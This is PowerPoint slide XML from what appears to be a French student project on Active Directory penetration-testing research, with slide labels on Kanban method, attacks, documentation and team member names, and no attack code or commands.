      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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5A13600-7035-533D-B03E-733B5BE87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7047" y="341703"/>
            <a:ext cx="3199460" cy="58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09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680634" y="6922055"/>
            <a:ext cx="4808220" cy="2670832"/>
            <a:chOff x="460896" y="117406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60896" y="117406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886" y="12346418"/>
              <a:ext cx="3715567" cy="3116171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31635" y="15564714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397528" y="424584"/>
            <a:ext cx="5196114" cy="5945756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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Méthode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="48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sz="2800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37011" y="7739681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6132195" y="2590844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728085" y="959288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2730571" y="26555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2802960" y="5059681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240780" y="9592888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547" y="5251175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74" y="3130994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33405" y="640950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266637" y="9678726"/>
            <a:ext cx="1327005" cy="130012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1D2E8172-5ABC-5BEC-3676-FEA578CFFB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5593552" y="2761328"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="389566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519F6070-BFAE-794E-DFBE-5C7A3DB4101C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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DACFA01D-3592-C2A2-46BA-B0F82A52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893" y="2474588"/>
              <a:ext cx="4268278" cy="3152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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effec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A66818D-40E9-6E25-0FF9-7A4BADEFE644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5292740" y="-5284278"/>
            <a:ext cx="6729115" cy="4994996"/>
            <a:chOff x="5291526" y="456122"/>
            <a:chExt cx="6729115" cy="4994996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596D30BC-2F8F-8B02-6C8A-45C17C2EB102}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5291526" y="456122"/>
              <a:ext cx="6729115" cy="4994996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D8D3781D-4A9E-3CE7-8428-99D7F748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97903" y="826834"/>
              <a:ext cx="6116359" cy="4158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99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680634" y="6922055"/>
            <a:ext cx="4808220" cy="2670832"/>
            <a:chOff x="460896" y="117406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60896" y="117406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886" y="12346418"/>
              <a:ext cx="3715567" cy="3116171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31635" y="15564714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-6990244" y="456122"/>
            <a:ext cx="5196114" cy="5945756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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Méthode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="48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sz="2800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37011" y="7739681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03729" y="456122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728085" y="959288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2730571" y="26555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2802960" y="5059681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240780" y="9592888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547" y="5251175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8" y="930715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33405" y="640950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266637" y="9678726"/>
            <a:ext cx="1327005" cy="130012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43D4D7C-1C63-781A-F4BD-2694B5E93FF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="303728" y="2487358"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="3895664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77B09789-9402-50FC-0F3C-2816E351C3B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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18E0988-B853-BA40-99D6-2574308F8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893" y="2474588"/>
              <a:ext cx="4268278" cy="3152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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst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D764DD7-D173-91BC-6448-3293B721593E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5292740" y="456122"/>
            <a:ext cx="6729115" cy="4994996"/>
            <a:chOff x="5291526" y="456122"/>
            <a:chExt cx="6729115" cy="4994996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ED75ABB4-7640-E918-AB2D-F265611E7F05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5291526" y="456122"/>
              <a:ext cx="6729115" cy="4994996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7DA2B52C-3E83-CB4B-8089-A5D17D103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97903" y="826834"/>
              <a:ext cx="6116359" cy="4158646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5C7AD97-5EFE-9FF0-D132-662CB751863D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12581612" y="3841941"/>
            <a:ext cx="4880610" cy="2287078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Séparer la</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="28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Vie Privée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Image 18" descr="Une image contenant blanc, conception&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546EE2AF-955E-4B54-06C5-E10C62C5A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960" y="11888740"/>
            <a:ext cx="5511636" cy="5511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565BF2D3-9589-A315-DE2D-07620014F378}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-55305" y="11976857"/>
            <a:ext cx="10479285" cy="4141666"/>
            <a:chOff x="303729" y="2231413"/>
            <a:chExt cx="10479285" cy="4141666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B1C0835-34E5-A6B5-A07F-7F0F160155EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303729" y="2231413"/>
              <a:ext cx="10479285" cy="4141666"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2D2B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F0622432-3510-ADC7-2462-7284683E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9202" y="2471313"/>
              <a:ext cx="9728338" cy="3685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761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680634" y="6922055"/>
            <a:ext cx="4808220" cy="2670832"/>
            <a:chOff x="460896" y="117406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60896" y="117406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886" y="12346418"/>
              <a:ext cx="3715567" cy="3116171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31635" y="15564714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-12739364" y="-3438516"/>
            <a:ext cx="5196114" cy="5945756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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Méthode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="48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sz="2800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37011" y="7739681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03729" y="456122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728085" y="959288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2730571" y="26555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2802960" y="5059681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240780" y="9592888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547" y="5251175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8" y="930715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33405" y="640950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266637" y="9678726"/>
            <a:ext cx="1327005" cy="130012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43D4D7C-1C63-781A-F4BD-2694B5E93FF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-98401" y="12671767"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="3895664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77B09789-9402-50FC-0F3C-2816E351C3B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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18E0988-B853-BA40-99D6-2574308F8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893" y="2474588"/>
              <a:ext cx="4268278" cy="3152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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst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D764DD7-D173-91BC-6448-3293B721593E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5632040" y="-4994996"/>
            <a:ext cx="6729115" cy="4994996"/>
            <a:chOff x="5291526" y="456122"/>
            <a:chExt cx="6729115" cy="4994996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ED75ABB4-7640-E918-AB2D-F265611E7F05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5291526" y="456122"/>
              <a:ext cx="6729115" cy="4994996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7DA2B52C-3E83-CB4B-8089-A5D17D103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97903" y="826834"/>
              <a:ext cx="6116359" cy="4158646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5C7AD97-5EFE-9FF0-D132-662CB751863D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12581612" y="3841941"/>
            <a:ext cx="4880610" cy="2287078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Séparer la</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="28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Vie Privée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Image 18" descr="Une image contenant blanc, conception&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546EE2AF-955E-4B54-06C5-E10C62C5A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80" y="12098290"/>
            <a:ext cx="5511636" cy="5511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B5D6CFDF-B287-2A0B-EBD3-7EDA2CF70AE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="303729" y="2231413"/>
            <a:ext cx="10479285" cy="4141666"/>
            <a:chOff x="303729" y="2231413"/>
            <a:chExt cx="10479285" cy="4141666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701A1488-FE82-1065-7167-C42517A4D0AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303729" y="2231413"/>
              <a:ext cx="10479285" cy="4141666"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2D2B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149970F-F803-9D88-063D-788DC165D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9202" y="2471313"/>
              <a:ext cx="9728338" cy="3685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1504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680634" y="6922055"/>
            <a:ext cx="4808220" cy="2670832"/>
            <a:chOff x="460896" y="117406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60896" y="117406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886" y="12346418"/>
              <a:ext cx="3715567" cy="3116171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31635" y="15564714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-6990244" y="456122"/>
            <a:ext cx="5196114" cy="5945756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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Méthode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="48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sz="2800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37011" y="7739681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03729" y="456122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728085" y="959288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2730571" y="26555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2802960" y="5059681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240780" y="9592888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547" y="5251175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8" y="930715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33405" y="640950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266637" y="9678726"/>
            <a:ext cx="1327005" cy="130012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43D4D7C-1C63-781A-F4BD-2694B5E93FF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-12503751" y="2391611"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="3895664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77B09789-9402-50FC-0F3C-2816E351C3B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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18E0988-B853-BA40-99D6-2574308F8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893" y="2474588"/>
              <a:ext cx="4268278" cy="3152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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst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D764DD7-D173-91BC-6448-3293B721593E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5462885" y="-5296978"/>
            <a:ext cx="6729115" cy="4994996"/>
            <a:chOff x="5291526" y="456122"/>
            <a:chExt cx="6729115" cy="4994996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ED75ABB4-7640-E918-AB2D-F265611E7F05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5291526" y="456122"/>
              <a:ext cx="6729115" cy="4994996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7DA2B52C-3E83-CB4B-8089-A5D17D103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97903" y="826834"/>
              <a:ext cx="6116359" cy="4158646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Image 22" descr="Une image contenant blanc, conception&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ACC3B1-9C4D-C87A-8AEC-01B6758D6A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37" y="775639"/>
            <a:ext cx="5511636" cy="5511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5876170-02EC-8464-F92B-378D8D098D52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32386" y="11729675"/>
            <a:ext cx="4880610" cy="2287078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Séparer la</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="28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Vie Privée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2142936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680634" y="6922055"/>
            <a:ext cx="4808220" cy="2670832"/>
            <a:chOff x="460896" y="117406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60896" y="117406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886" y="12346418"/>
              <a:ext cx="3715567" cy="3116171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31635" y="15564714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-6990244" y="456122"/>
            <a:ext cx="5196114" cy="5945756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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Méthode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="48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sz="2800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-37011" y="7739681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03729" y="456122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728085" y="9592888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12730571" y="265557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12802960" y="5059681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547" y="5251175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8" y="930715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33405" y="640950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266637" y="9678726"/>
            <a:ext cx="1327005" cy="130012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43D4D7C-1C63-781A-F4BD-2694B5E93FF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-12503751" y="2391611"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="3895664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77B09789-9402-50FC-0F3C-2816E351C3B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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18E0988-B853-BA40-99D6-2574308F8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893" y="2474588"/>
              <a:ext cx="4268278" cy="3152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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst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D764DD7-D173-91BC-6448-3293B721593E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5462885" y="-5296978"/>
            <a:ext cx="6729115" cy="4994996"/>
            <a:chOff x="5291526" y="456122"/>
            <a:chExt cx="6729115" cy="4994996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ED75ABB4-7640-E918-AB2D-F265611E7F05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5291526" y="456122"/>
              <a:ext cx="6729115" cy="4994996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7DA2B52C-3E83-CB4B-8089-A5D17D103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97903" y="826834"/>
              <a:ext cx="6116359" cy="4158646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Image 22" descr="Une image contenant blanc, conception&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ACC3B1-9C4D-C87A-8AEC-01B6758D6A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37" y="775639"/>
            <a:ext cx="5511636" cy="5511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06F55F3-90A8-2432-CFE4-697C063A3B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372626" y="3390411"/>
            <a:ext cx="4880610" cy="2287078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Séparer la</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="28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Vie Privée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CA581FA-37AD-BDF7-C001-FB626E8CF1F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201637" y="9635806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769163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2F1902F-A2F1-86C7-DF9E-22E672C7A048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3691890" y="2093584"/>
            <a:ext cx="4808220" cy="2670832"/>
            <a:chOff x="487680" y="251390"/>
            <a:chExt cx="11441112" cy="6355219"/>
          </a:xfr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F9F211-C255-6B1A-9464-62AD6E071D07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487680" y="251390"/>
              <a:ext cx="11441112" cy="63552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Picture 50" descr="Une image contenant cercle, Graphique, art, conception&#10;&#10;Description générée automatiquement">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4336FC80-88AD-CA24-1806-49851E2CDE86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453" y="1086388"/>
              <a:ext cx="3715566" cy="3116170"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Sous-titre 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{202A9E83-8637-1FA6-1B1F-1089FF1BA9B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noGrp="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:ph type="subTitle" idx="1"/>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1385200" y="4640146"/>
              <a:ext cx="9646072" cy="1834982"/>
            </a:xfrm>
            <a:grpFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:normAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="72CBBD"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Montserrat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RECHERCHE PENTEST AD </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat" pitchFamily="2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endParaRPr lang="fr-FR" sz="1200" dirty="0"/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D5322A0-8087-90E8-D607-6F4B49D26C52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158116" y="320813"/>
            <a:ext cx="3400425" cy="2593489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itchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Méthode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="76CABB"/>
                    </a:gs>
                    <a:gs pos="44000">
                      <a:srgbClr val="76CABB"/>
                    </a:gs>
                    <a:gs pos="72000">
                      <a:srgbClr val="2A6C5F"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="1"/>
                </a:gradFill>
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Kanban</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="76CABB"/>
                  </a:gs>
                  <a:gs pos="44000">
                    <a:srgbClr val="76CABB"/>
                  </a:gs>
                  <a:gs pos="72000">
                    <a:srgbClr val="2A6C5F"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:latin typeface="Montserrat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EE229F-09BB-5B05-62D3-5D862AE1ED51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158116" y="3206474"/>
            <a:ext cx="3400425" cy="3325009"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="76CABB">
                  <a:shade val="30000"/>
                  <a:satMod val="115000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="76CABB">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="76CAB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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="11500" b="1" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Active Directory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730C1E-4764-5808-B85B-BD4D005E8D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3691890" y="320813"/>
            <a:ext cx="4880610" cy="1689724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1433812-BEE5-F2E0-AED7-D77265316CA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3691890" y="4948315"/>
            <a:ext cx="240411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D2FD94-84B1-13B6-BEC7-0B208C9904D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681085" y="320813"/>
            <a:ext cx="3400425" cy="4443603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20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endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0">
              <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Documentation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BFC85-9403-C7E3-222D-99C4C4CEA618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681085" y="4948315"/>
            <a:ext cx="3328036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049C1E-8F2E-4BB1-B127-C27447941637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6204586" y="4948316"/>
            <a:ext cx="2331720" cy="1471802"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="2D2B2B"/>
              </a:gs>
              <a:gs pos="62000">
                <a:srgbClr val="353333"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3533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Bour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Valentin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Omary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Saad Eddine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De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="76CABB"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Brémand</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Thibault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76CABB"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Leblanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Mike</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
